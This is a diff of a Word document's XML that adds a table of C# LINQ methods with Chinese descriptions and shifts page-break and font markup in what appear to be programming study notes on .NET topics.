+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Last</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>返回数据源最后一个条目</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>LastOrDefault</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>返回数据源最后一个条目，或无条目时，返回默认值</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Max或Min</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>返回由Lamdba表达式表示的最大值或最小值</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>OrderBy</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>OrderByDesceding</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>基于Lambda表示式返回值对数据源进行排序</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>是</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Reverse</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>反转数据源中数据项的顺序</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>是</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Select</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>设计一个查询结果</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>是</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>SelectMany</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>把每个数据项投射到一个条目序列中，然后把所有的这些结果序列连接成一个序列</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>是</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Single</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>返回数据源第一个条目，或者有多个匹配时抛出异常</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>SingleOrDefault</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>返回数据源第一个条目，或无条目时，返回默认值；有多个条目匹配时，抛出一个异常</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Skip</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>SkipWhile</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>跳过指定数目的元素，或者当谓词匹配时跳过</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>是</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Sum</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>对谓词选定的词求和</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Take</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>TakeWhile</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>从数据源的开始处选择指定数目的元素，或当谓词匹配时选择条目</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>是</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ToArray</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ToDictionary</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>ToList</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>把数据源转成数组，字典，列表</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>否</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2096" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Where</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="7807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>过滤数据源中与谓词不匹配的条目</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="779" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="ad"/>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>是</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ad"/>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4717,7 +5700,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Where()</w:t>
       </w:r>
       <w:r>
@@ -4973,6 +5955,7 @@
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cstheme="minorEastAsia" w:hint="eastAsia"/>
           <w:szCs w:val="21"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>该方法的第一个委托参数第一个参数TSource表示数据源，返回值为合并后的集合，第二个委托参数第一个参数TSource表示相同的数据源，第二个参数表示第一个委托参数的返回值(集合)，第三个参数表示合并后的集合</w:t>
       </w:r>
     </w:p>
@@ -5961,7 +6944,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>常见的遍历文档的方法有</w:t>
       </w:r>
       <w:r>
@@ -6325,6 +7307,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>我们可以在</w:t>
       </w:r>
       <w:r>
@@ -7408,7 +8391,6 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>数据层</w:t>
       </w:r>
     </w:p>
@@ -7725,6 +8707,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>赋予</w:t>
       </w:r>
       <w:r>
@@ -8653,7 +9636,6 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>异步和多线程</w:t>
       </w:r>
     </w:p>
@@ -8800,6 +9782,7 @@
           <w:color w:val="FF0000"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>使用异步编程，方法调用时在后台运行，并且不会阻塞调用线程。</w:t>
       </w:r>
     </w:p>
@@ -9576,7 +10559,6 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Task</w:t>
       </w:r>
       <w:r>
@@ -9834,6 +10816,7 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>百鸡算法，贪婪思想，递归</w:t>
       </w:r>
     </w:p>
@@ -10573,14 +11556,7 @@
         <w:rPr>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:t>时，总是做出在当前看来是最好的选择。也就</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>是说，不从整体最优上加以考虑，他所做出的是在某种意义上的局部</w:t>
+        <w:t>时，总是做出在当前看来是最好的选择。也就是说，不从整体最优上加以考虑，他所做出的是在某种意义上的局部</w:t>
       </w:r>
       <w:hyperlink r:id="rId12" w:tgtFrame="https://baike.baidu.com/item/%E8%B4%AA%E5%BF%83%E7%AE%97%E6%B3%95/_blank" w:history="1">
         <w:r>
@@ -10868,6 +11844,7 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>ASP.NET MVC</w:t>
       </w:r>
       <w:r>
@@ -11508,7 +12485,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>ASP.NET</w:t>
       </w:r>
       <w:r>
@@ -12039,6 +13015,7 @@
           <w:sz w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Routing路由</w:t>
       </w:r>
     </w:p>
@@ -12957,6 +13934,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>System.ComponentModel.DataAnnotations.DataTypeAttribute</w:t>
       </w:r>
     </w:p>
@@ -13843,7 +14821,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>数据库分库、拆表、分布式、集群、备份、故障调控等方案</w:t>
       </w:r>
     </w:p>
@@ -14216,6 +15193,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>幻读</w:t>
       </w:r>
     </w:p>
@@ -14880,7 +15858,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2768012"/>
@@ -14936,6 +15913,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="1845960"/>
@@ -15246,7 +16224,6 @@
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>OS X</w:t>
       </w:r>
     </w:p>
@@ -15410,6 +16387,7 @@
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>SQL Server</w:t>
       </w:r>
       <w:r>
@@ -16162,7 +17140,6 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>总结</w:t>
       </w:r>
     </w:p>
@@ -16289,6 +17266,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>MongoDb</w:t>
       </w:r>
       <w:r>
@@ -17464,7 +18442,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>包含</w:t>
       </w:r>
       <w:r>
@@ -17841,6 +18818,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>求模</w:t>
       </w:r>
       <w:r>
@@ -19079,6 +20057,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>例子：</w:t>
       </w:r>
       <w:r>
@@ -19866,7 +20845,6 @@
           <w:b/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>分布式文件系统</w:t>
       </w:r>
     </w:p>
@@ -20560,7 +21538,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>{</w:t>
       </w:r>
     </w:p>
@@ -20837,6 +21814,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t>{</w:t>
       </w:r>
@@ -25952,7 +26930,6 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -26046,7 +27023,6 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
@@ -26318,7 +27294,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
           <w:sz w:val="44"/>
           <w:szCs w:val="44"/>
         </w:rPr>
@@ -26343,7 +27319,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
         <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
           <w:sz w:val="44"/>
           <w:szCs w:val="44"/>
         </w:rPr>
@@ -26357,20 +27333,20 @@
           <w:numId w:val="46"/>
         </w:numPr>
         <w:ind w:left="450"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体" w:hint="eastAsia"/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="28"/>
